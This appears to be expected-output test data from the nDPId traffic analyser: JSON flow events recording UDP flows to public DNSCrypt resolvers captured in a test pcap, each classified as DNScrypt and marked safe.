+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":88,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312132,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1661,"flow_avg_l4_payload_len":830,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":33521,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":111,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317432,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":46066,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705349,"flow_last_seen":946739305459,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35228,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":167,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739337184,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":58650,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739299327,"flow_last_seen":946739299356,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"62.210.180.71","src_port":52636,"dst_port":1053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":52,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305217,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":692,"flow_avg_l4_payload_len":346,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44093,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":134,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":45497,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00701{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":155,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337048,"flow_last_seen":946739337079,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.124.208","src_port":39910,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":105,"flow_state":"finished","flow_packets_processed":1,"flow_first_seen":946739312402,"flow_last_seen":946739312402,"flow_idle_time":200000,"flow_min_l4_payload_len":1472,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1472,"flow_avg_l4_payload_len":1472,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"93.95.226.165","src_port":58113,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":98,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312286,"flow_last_seen":946739312401,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"66.85.30.115","src_port":48448,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":210,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739396070,"flow_last_seen":946739396113,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"46.227.200.55","src_port":49177,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304628,"flow_last_seen":946739304791,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"41.79.69.13","src_port":56177,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":170,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348804,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":44469,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":63,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305351,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1515,"flow_avg_l4_payload_len":757,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":56022,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":56,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305219,"flow_last_seen":946739305330,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1658,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.204.111","src_port":60962,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":30,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304629,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1651,"flow_avg_l4_payload_len":825,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":59367,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":48,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305155,"flow_last_seen":946739305194,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1654,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.59.200.116","src_port":59194,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":189,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381015,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":46646,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739391046,"flow_last_seen":946739391308,"flow_idle_time":200000,"flow_min_l4_payload_len":182,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":694,"flow_avg_l4_payload_len":347,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"139.99.222.72","src_port":59400,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":187,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380983,"flow_last_seen":946739381016,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"85.5.93.230","src_port":58948,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":72,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306435,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":56902,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00695{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":86,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739312105,"flow_last_seen":946739312133,"flow_idle_time":200000,"flow_min_l4_payload_len":189,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":701,"flow_avg_l4_payload_len":350,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.15.62.65","src_port":45993,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":112,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317403,"flow_last_seen":946739317429,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"51.158.166.97","src_port":56494,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":157,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337184,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":36930,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":25,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304599,"flow_last_seen":946739304626,"flow_idle_time":200000,"flow_min_l4_payload_len":179,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":691,"flow_avg_l4_payload_len":345,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"209.250.241.25","src_port":32793,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":164,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337184,"flow_last_seen":946739337214,"flow_idle_time":200000,"flow_min_l4_payload_len":195,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":707,"flow_avg_l4_payload_len":353,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"5.189.170.196","src_port":44496,"dst_port":465,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00703{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":124,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739317462,"flow_last_seen":946739317496,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"178.216.201.222","src_port":52221,"dst_port":2053,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":17,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739304328,"flow_last_seen":946739304360,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.134.196.55","src_port":50435,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":54,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305192,"flow_last_seen":946739305220,"flow_idle_time":200000,"flow_min_l4_payload_len":180,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1652,"flow_avg_l4_payload_len":826,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"195.30.94.28","src_port":44282,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":135,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318063,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1659,"flow_avg_l4_payload_len":829,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":47729,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":133,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318038,"flow_last_seen":946739318059,"flow_idle_time":200000,"flow_min_l4_payload_len":187,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":699,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"151.80.222.79","src_port":53876,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":139,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739318061,"flow_last_seen":946739318164,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"142.4.205.47","src_port":59011,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00699{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":183,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739380804,"flow_last_seen":946739380834,"flow_idle_time":200000,"flow_min_l4_payload_len":186,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":698,"flow_avg_l4_payload_len":349,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"212.47.228.136","src_port":52056,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305457,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":45722,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":4,"flow_first_seen":946735705348,"flow_last_seen":946739305460,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":3312,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.56.228.45","src_port":35495,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":174,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739348756,"flow_last_seen":946739348805,"flow_idle_time":200000,"flow_min_l4_payload_len":183,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1655,"flow_avg_l4_payload_len":827,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"185.253.154.66","src_port":38482,"dst_port":4343,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00698{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":61,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739305327,"flow_last_seen":946739305349,"flow_idle_time":200000,"flow_min_l4_payload_len":43,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":555,"flow_avg_l4_payload_len":277,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"149.112.112.10","src_port":50035,"dst_port":8443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00697{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":79,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739311802,"flow_last_seen":946739312102,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":512,"flow_tot_l4_payload_len":696,"flow_avg_l4_payload_len":348,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"52.65.235.129","src_port":55834,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
+00702{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":161,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739337078,"flow_last_seen":946739337188,"flow_idle_time":200000,"flow_min_l4_payload_len":184,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1656,"flow_avg_l4_payload_len":828,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"167.114.220.125","src_port":59589,"dst_port":443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} +00700{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":597,"source":"dnscrypt-v1-and-resolver-pings.pcap","alias":"nDPId-test","flow_id":68,"flow_state":"finished","flow_packets_processed":2,"flow_first_seen":946739306241,"flow_last_seen":946739306434,"flow_idle_time":200000,"flow_min_l4_payload_len":319,"flow_max_l4_payload_len":1472,"flow_tot_l4_payload_len":1791,"flow_avg_l4_payload_len":895,"midstream":0,"thread_ts_msec":946739620112,"l3_proto":"ip4","src_ip":"10.0.0.1","dst_ip":"172.104.93.80","src_port":50913,"dst_port":1443,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNScrypt","breed":"Safe","category":"Network"}} 
